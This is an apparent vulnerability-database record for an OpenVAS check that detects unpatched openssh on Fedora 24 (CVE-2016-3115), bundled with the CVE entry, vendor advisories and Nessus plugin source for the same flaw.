ID OPENVAS:1361412562310807752 Type openvas Reporter Copyright (C) 2016 Greenbone Networks GmbH Modified 2019-03-15T00:00:00
Description
The remote host is missing an update for the 'openssh' package(s) announced via the referenced advisory.
###############################################################################
# OpenVAS Vulnerability Test
#
# Fedora Update for openssh FEDORA-2016-0
#
# Authors:
# System Generated Check
#
# Copyright:
# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
if(description)
{
  # Identity and revision of this check.
  script_oid("1.3.6.1.4.1.25623.1.0.807752");
  script_version("$Revision: 14223 $");
  script_tag(name:"last_modification", value:"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $");
  script_tag(name:"creation_date", value:"2016-04-11 14:52:19 +0200 (Mon, 11 Apr 2016)");

  # Vulnerability reference and CVSSv2 base score (network, low complexity,
  # single authentication required, partial C/I impact).
  script_cve_id("CVE-2016-3115");
  script_tag(name:"cvss_base", value:"5.5");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:S/C:P/I:P/A:N");

  # Quality of detection: the verdict rests on the installed package version
  # reported over the SSH login, not on probing the sshd service itself.
  script_tag(name:"qod_type", value:"package");

  script_name("Fedora Update for openssh FEDORA-2016-0");
  script_tag(name:"summary", value:"The remote host is missing an update for the 'openssh'
package(s) announced via the referenced advisory.");
  script_tag(name:"vuldetect", value:"Checks if a vulnerable version is present on the target host.");
  script_tag(name:"affected", value:"openssh on Fedora 24");
  script_tag(name:"solution", value:"Please install the updated package(s).");
  script_tag(name:"solution_type", value:"VendorFix");

  # Advisory cross-references.
  # NOTE(review): the FEDORA id "2016-0" looks truncated; confirm the full
  # advisory id against the announce-list URL below.
  script_xref(name:"FEDORA", value:"2016-0");
  script_xref(name:"URL", value:"https://lists.fedoraproject.org/pipermail/package-announce/2016-March/179924.html");

  script_category(ACT_GATHER_INFO);
  script_copyright("Copyright (C) 2016 Greenbone Networks GmbH");
  script_family("Fedora Local Security Checks");

  # Requires the authenticated package inventory, and only fires when the
  # SSH login identified the target as Fedora with release FC24.
  script_dependencies("gather-package-list.nasl");
  script_mandatory_keys("ssh/login/fedora", "ssh/login/rpms", re:"ssh/login/release=FC24");

  exit(0);
}
include("revisions-lib.inc");
include("pkg-lib-rpm.inc");
# The release string comes from the SSH login done by gather-package-list.nasl;
# without it there is no package inventory to compare against, so stop quietly.
release = rpm_get_ssh_release();
if(!release)
  exit(0);

# Guard clause: this advisory covers Fedora 24 only. Any other release is out
# of scope and the script ends without a result.
if(release != "FC24")
  exit(0);

res = "";

# isrpmvuln (from pkg-lib-rpm.inc) hands back a report string when the
# installed openssh is considered vulnerable relative to the fixed build
# openssh-7.2p2-1.fc24 -- presumed from the helper's name and the "package"
# QoD; the actual version comparison lives in the include, not here.
res = isrpmvuln(pkg:"openssh", rpm:"openssh~7.2p2~1.fc24", rls:"FC24");
if(res != NULL)
{
  security_message(data:res);
  exit(0);
}

# NOTE(review): __pkg_match is presumably set by pkg-lib-rpm.inc when the
# package was found at all; exit(99) is understood to be the feed convention
# for "package present, not vulnerable" -- confirm against the include.
if(__pkg_match)
  exit(99);

exit(0);
{"id": "OPENVAS:1361412562310807752", "type": "openvas", "bulletinFamily": "scanner", "title": "Fedora Update for openssh FEDORA-2016-0", "description": "The remote host is missing an update for the ", "published": "2016-04-11T00:00:00", "modified": "2019-03-15T00:00:00", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310807752", "reporter": "Copyright (C) 2016 Greenbone Networks GmbH", "references": ["2016-0", "https://lists.fedoraproject.org/pipermail/package-announce/2016-March/179924.html"], "cvelist": ["CVE-2016-3115"], "lastseen": "2019-05-29T18:35:18", "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2016-3115"]}, {"type": "f5", "idList": ["F5:K93532943", "SOL93532943"]}, {"type": "amazon", "idList": ["ALAS-2016-668"]}, {"type": "nessus", "idList": ["ALA_ALAS-2016-668.NASL", "FEDORA_2016-0BCAB055A7.NASL", "FEDORA_2016-08E5803496.NASL", "F5_BIGIP_SOL93532943.NASL", "FEDORA_2016-FC1CC33E05.NASL", "SLACKWARE_SSA_2016-070-01.NASL", "FEDORA_2016-BB59DB3C86.NASL", "ORACLEVM_OVMSA-2016-0048.NASL", "FEDORA_2016-D339D610C1.NASL", "FREEBSD_PKG_E4644DF8E7DA11E5829DC80AA9043978.NASL"]}, {"type": "threatpost", "idList": ["THREATPOST:F895E4C708DB124636408645530A739D"]}, {"type": "seebug", "idList": ["SSV:91041"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:136234", "PACKETSTORM:140019"]}, {"type": "freebsd", "idList": ["E4644DF8-E7DA-11E5-829D-C80AA9043978"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310120658", "OPENVAS:1361412562310131265", "OPENVAS:1361412562311220161008", "OPENVAS:1361412562310871580", "OPENVAS:1361412562310882431", "OPENVAS:1361412562310882432", "OPENVAS:1361412562310807983", "OPENVAS:1361412562310105581", "OPENVAS:1361412562310871579", "OPENVAS:1361412562310807942"]}, {"type": "fedora", "idList": ["FEDORA:34AAC6006272", "FEDORA:6D06760BBCF5", "FEDORA:ECCBA601614F", "FEDORA:407BB60A2C79", "FEDORA:6A9C96049DE4", 
"FEDORA:8B394604A712"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:1902C998CBF9154396911926B4C3B330", "EXPLOITPACK:F92411A645D85F05BDBD274FD222226F", "EXPLOITPACK:9F2E746846C3C623A27A441281EAD138"]}, {"type": "exploitdb", "idList": ["EDB-ID:40858", "EDB-ID:39569"]}, {"type": "archlinux", "idList": ["ASA-201603-12"]}, {"type": "slackware", "idList": ["SSA-2016-070-01"]}, {"type": "oraclelinux", "idList": ["ELSA-2016-0741", "ELSA-2016-0466", "ELSA-2016-0465", "ELSA-2016-3531"]}, {"type": "redhat", "idList": ["RHSA-2016:0465", "RHSA-2016:0466"]}, {"type": "symantec", "idList": ["SMNTC-1361"]}, {"type": "centos", "idList": ["CESA-2016:0465", "CESA-2016:0466"]}, {"type": "aix", "idList": ["OPENSSH_ADVISORY8.ASC"]}, {"type": "ubuntu", "idList": ["USN-2966-1"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:782597A83B98B15285C8A73B8555B7B2"]}, {"type": "gentoo", "idList": ["GLSA-201612-18"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1500-1:E6BD7"]}], "modified": "2019-05-29T18:35:18", "rev": 2}, "score": {"value": 6.4, "vector": "NONE", "modified": "2019-05-29T18:35:18", "rev": 2}, "vulnersScore": 6.4}, "pluginID": "1361412562310807752", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for openssh FEDORA-2016-0\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807752\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-04-11 14:52:19 +0200 (Mon, 11 Apr 2016)\");\n script_cve_id(\"CVE-2016-3115\");\n script_tag(name:\"cvss_base\", value:\"5.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for openssh FEDORA-2016-0\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'openssh'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"openssh on Fedora 24\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-0\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2016-March/179924.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC24\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = 
rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"openssh\", rpm:\"openssh~7.2p2~1.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "naslFamily": "Fedora Local Security Checks"}
{"cve": [{"lastseen": "2021-02-02T06:28:05", "description": "Multiple CRLF injection vulnerabilities in session.c in sshd in OpenSSH before 7.2p2 allow remote authenticated users to bypass intended shell-command restrictions via crafted X11 forwarding data, related to the (1) do_authenticated1 and (2) session_x11_req functions.\n<a href=\"https://cwe.mitre.org/data/definitions/93.html\">CWE-93: Improper Neutralization of CRLF Sequences ('CRLF Injection')</a>", "edition": 6, "cvss3": {"exploitabilityScore": 3.1, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.4, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 2.7}, "published": "2016-03-22T10:59:00", "title": "CVE-2016-3115", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3115"], "modified": "2018-09-11T10:29:00", "cpe": ["cpe:/o:oracle:vm_server:3.2", "cpe:/a:openbsd:openssh:7.2"], "id": "CVE-2016-3115", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3115", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}, "cpe23": ["cpe:2.3:o:oracle:vm_server:3.2:*:*:*:*:*:*:*", "cpe:2.3:a:openbsd:openssh:7.2:p1:*:*:*:*:*:*"]}], "f5": [{"lastseen": "2020-04-06T22:40:25", "bulletinFamily": "software", "cvelist": 
["CVE-2016-3115"], "description": "\nF5 Product Development has assigned ID 583678 (BIG-IP), ID 584222 (Enterprise Manager), ID 584220 (BIG-IQ), INSTALLER-2306 (Traffix SDC), and LRS-60665 (LineRate) to this vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H589591 on the **Diagnostics** > **Identified** > **Medium** page. \n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.3 \n11.2.1 \n10.2.1 - 10.2.4 | 14.0.0 \n13.0.0 \n12.1.3 | Medium | OpenSSH * \nBIG-IP AAM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.3 | 14.0.0 \n13.0.0 \n12.1.3 | Medium | OpenSSH * \nBIG-IP AFM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.3 | 14.0.0 \n13.0.0 \n12.1.3 | Medium | OpenSSH * \nBIG-IP Analytics | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.3 | 14.0.0 \n13.0.0 \n12.1.3 | Medium | OpenSSH * \nBIG-IP APM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.3 \n11.2.1 \n10.2.1 - 10.2.4 | 14.0.0 \n13.0.0 \n12.1.3 | Medium | OpenSSH * \nBIG-IP ASM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.3 \n11.2.1 \n10.2.1 - 10.2.4 | 14.0.0 \n13.0.0 \n12.1.3 | Medium | OpenSSH * \nBIG-IP DNS | 12.0.0 - 12.1.2 | 14.0.0 \n13.0.0 \n12.1.3 | Medium | OpenSSH * \nBIG-IP Edge Gateway | 11.2.1 \n10.2.1 - 10.2.4 | None | Medium | OpenSSH * \nBIG-IP GTM | 11.4.0 - 11.6.3 \n11.2.1 \n10.2.1 - 10.2.4 | None | Medium | OpenSSH * \nBIG-IP Link Controller | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.3 \n11.2.1 \n10.2.1 - 10.2.4 | 14.0.0 \n13.0.0 \n12.1.3 | Medium | OpenSSH * \nBIG-IP PEM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.3 | 14.0.0 \n13.0.0 \n12.1.3 | Medium | OpenSSH * \nBIG-IP PSM | 11.4.0 - 11.4.1 \n11.2.1 \n10.2.1 - 10.2.4 | None | 
Medium | OpenSSH * \nBIG-IP WebAccelerator | 11.2.1 \n10.2.1 - 10.2.4 | None | Medium | OpenSSH * \nBIG-IP WOM | 11.2.1 \n10.2.1 - 10.2.4 | None | Medium | OpenSSH * \nARX | None | 6.0.0 - 6.4.0 | Not vulnerable | None \nEnterprise Manager | 3.0.0 - 3.1.1 | None | Medium | OpenSSH * \nFirePass | None | 7.0.0 \n6.0.0 - 6.1.0 | Not vulnerable | None \nBIG-IQ Cloud | 4.0.0 - 4.5.0 | None | Medium | OpenSSH * \nBIG-IQ Device | 4.2.0 - 4.5.0 | None | Medium | OpenSSH * \nBIG-IQ Security | 4.0.0 - 4.5.0 | None | Medium | OpenSSH * \nBIG-IQ ADC | 4.5.0 | None | Medium | OpenSSH * \nBIG-IQ Centralized Management | 4.6.0 | None | Medium | OpenSSH * \nBIG-IQ Cloud and Orchestration | 1.0.0 | None | Medium | OpenSSH * \nLineRate | 2.5.0 - 2.6.1 | None | Low | OpenSSH \nF5 WebSafe | None | 1.0.0 | Not vulnerable | None \nTraffix SDC | 4.0.0 - 4.4.0 \n3.3.2 - 3.5.1 | None | Low | OpenSSH \n \n* The affected versions ship with vulnerable code, but do not enable the code by default. The X11Forwarding option is not enabled unless explicitly enabled by an administrator.\n\nIf you are running a version listed in the **Versions known to be vulnerable **column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable **column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo determine the necessary upgrade path for your BIG-IQ system, you should understand the BIG-IQ product offering name changes. For more information, refer to [K21232150: Considerations for upgrading BIG-IQ or F5 iWorkflow systems](<https://support.f5.com/csp/article/K21232150>).\n\nMitigation\n\nTo mitigate this vulnerability, you can ensure that the X11Forwarding option is absent, commented out, or set to \"no\" in the **sshd_config** configuration file. 
Additionally, you may restrict remote access to the **sshd** TCP port 22 to trusted networks only.\n\n**Impact of action:** Performing the suggested mitigations should not have a negative impact on your system.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n", "edition": 1, "modified": "2018-10-18T21:55:00", "published": "2016-04-27T21:18:00", "id": "F5:K93532943", "href": "https://support.f5.com/csp/article/K93532943", "title": "SSHD session.c vulnerability CVE-2016-3115", "type": "f5", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}, {"lastseen": "2016-04-27T21:01:54", "bulletinFamily": "software", "cvelist": ["CVE-2016-3115"], "edition": 1, "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the **Severity** values published in the previous table. 
The **Severity** values and other security vulnerability parameters are defined in SOL4602: Overview of the F5 security vulnerability response policy.\n\nTo mitigate this vulnerability, you can ensure that the X11Forwarding option is absent, commented out, or set to \"no\" in the **sshd_config** configuration file. Additionally you may restrict remote access to the **sshd** TCP port 22 to trusted networks only.\n\n**Impact of action:** Performing the suggested mitigations should not have a negative impact on your system.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * SOL13123: Managing BIG-IP product hotfixes (11.x - 12.x)\n * SOL10025: Managing BIG-IP product hotfixes (10.x)\n * SOL9502: BIG-IP hotfix matrix\n * SOL15106: Managing BIG-IQ product hotfixes\n * SOL15113: BIG-IQ hotfix matrix\n", "modified": "2016-04-27T00:00:00", "published": "2016-04-27T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/k/93/sol93532943.html", "id": "SOL93532943", "title": "SOL93532943 - SSHD session.c vulnerability CVE-2016-3115", "type": "f5", "cvss": {"score": 5.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:NONE/"}}], "amazon": [{"lastseen": "2020-11-10T12:37:32", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3115"], "description": "**Issue Overview:**\n\nIt was discovered that the OpenSSH server did not sanitize data received in requests to enable X11 forwarding. An authenticated client with restricted SSH access could possibly use this flaw to bypass intended restrictions.\n\n \n**Affected Packages:** \n\n\nopenssh\n\n \n**Issue Correction:** \nRun _yum update openssh_ to update your system. 
\n\n\n \n\n\n**New Packages:**\n \n \n i686: \n openssh-server-6.6.1p1-23.60.amzn1.i686 \n openssh-keycat-6.6.1p1-23.60.amzn1.i686 \n openssh-debuginfo-6.6.1p1-23.60.amzn1.i686 \n openssh-6.6.1p1-23.60.amzn1.i686 \n pam_ssh_agent_auth-0.9.3-9.23.60.amzn1.i686 \n openssh-ldap-6.6.1p1-23.60.amzn1.i686 \n openssh-clients-6.6.1p1-23.60.amzn1.i686 \n \n src: \n openssh-6.6.1p1-23.60.amzn1.src \n \n x86_64: \n openssh-keycat-6.6.1p1-23.60.amzn1.x86_64 \n pam_ssh_agent_auth-0.9.3-9.23.60.amzn1.x86_64 \n openssh-clients-6.6.1p1-23.60.amzn1.x86_64 \n openssh-ldap-6.6.1p1-23.60.amzn1.x86_64 \n openssh-6.6.1p1-23.60.amzn1.x86_64 \n openssh-server-6.6.1p1-23.60.amzn1.x86_64 \n openssh-debuginfo-6.6.1p1-23.60.amzn1.x86_64 \n \n \n", "edition": 3, "modified": "2016-03-16T16:30:00", "published": "2016-03-16T16:30:00", "id": "ALAS-2016-668", "href": "https://alas.aws.amazon.com/ALAS-2016-668.html", "title": "Medium: openssh", "type": "amazon", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}], "nessus": [{"lastseen": "2021-01-12T10:14:50", "description": "This update provides recent upstrem fix published with openssh-7.2p2\n(#1316529).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 18, "cvss3": {"score": 6.4, "vector": "AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"}, "published": "2016-04-01T00:00:00", "title": "Fedora 22 : openssh-6.9p1-11.fc22 (2016-d339d610c1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3115"], "modified": "2016-04-01T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:openssh", "cpe:/o:fedoraproject:fedora:22"], "id": "FEDORA_2016-D339D610C1.NASL", "href": "https://www.tenable.com/plugins/nessus/90285", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2016-d339d610c1.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90285);\n script_version(\"2.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-3115\");\n script_xref(name:\"FEDORA\", value:\"2016-d339d610c1\");\n\n script_name(english:\"Fedora 22 : openssh-6.9p1-11.fc22 (2016-d339d610c1)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update provides recent upstrem fix published with openssh-7.2p2\n(#1316529).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1316829\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2016-March/180491.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?9163a8a7\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openssh package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:22\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/04/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^22([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 22.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC22\", reference:\"openssh-6.9p1-11.fc22\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssh\");\n}\n", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}, {"lastseen": "2021-01-12T10:15:04", "description": "Sync with openssh package.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 18, "cvss3": {"score": 6.4, "vector": "AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"}, "published": "2016-04-27T00:00:00", "title": "Fedora 22 : gsi-openssh-6.9p1-8.fc22 (2016-fc1cc33e05)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3115"], "modified": "2016-04-27T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:gsi-openssh", "cpe:/o:fedoraproject:fedora:22"], "id": "FEDORA_2016-FC1CC33E05.NASL", "href": "https://www.tenable.com/plugins/nessus/90740", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2016-fc1cc33e05.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90740);\n script_version(\"2.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-3115\");\n script_xref(name:\"FEDORA\", value:\"2016-fc1cc33e05\");\n\n script_name(english:\"Fedora 22 : gsi-openssh-6.9p1-8.fc22 (2016-fc1cc33e05)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Sync with openssh package.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1318201\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2016-April/183101.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?354d4b7a\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected gsi-openssh package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:gsi-openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:22\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/04/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/04/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
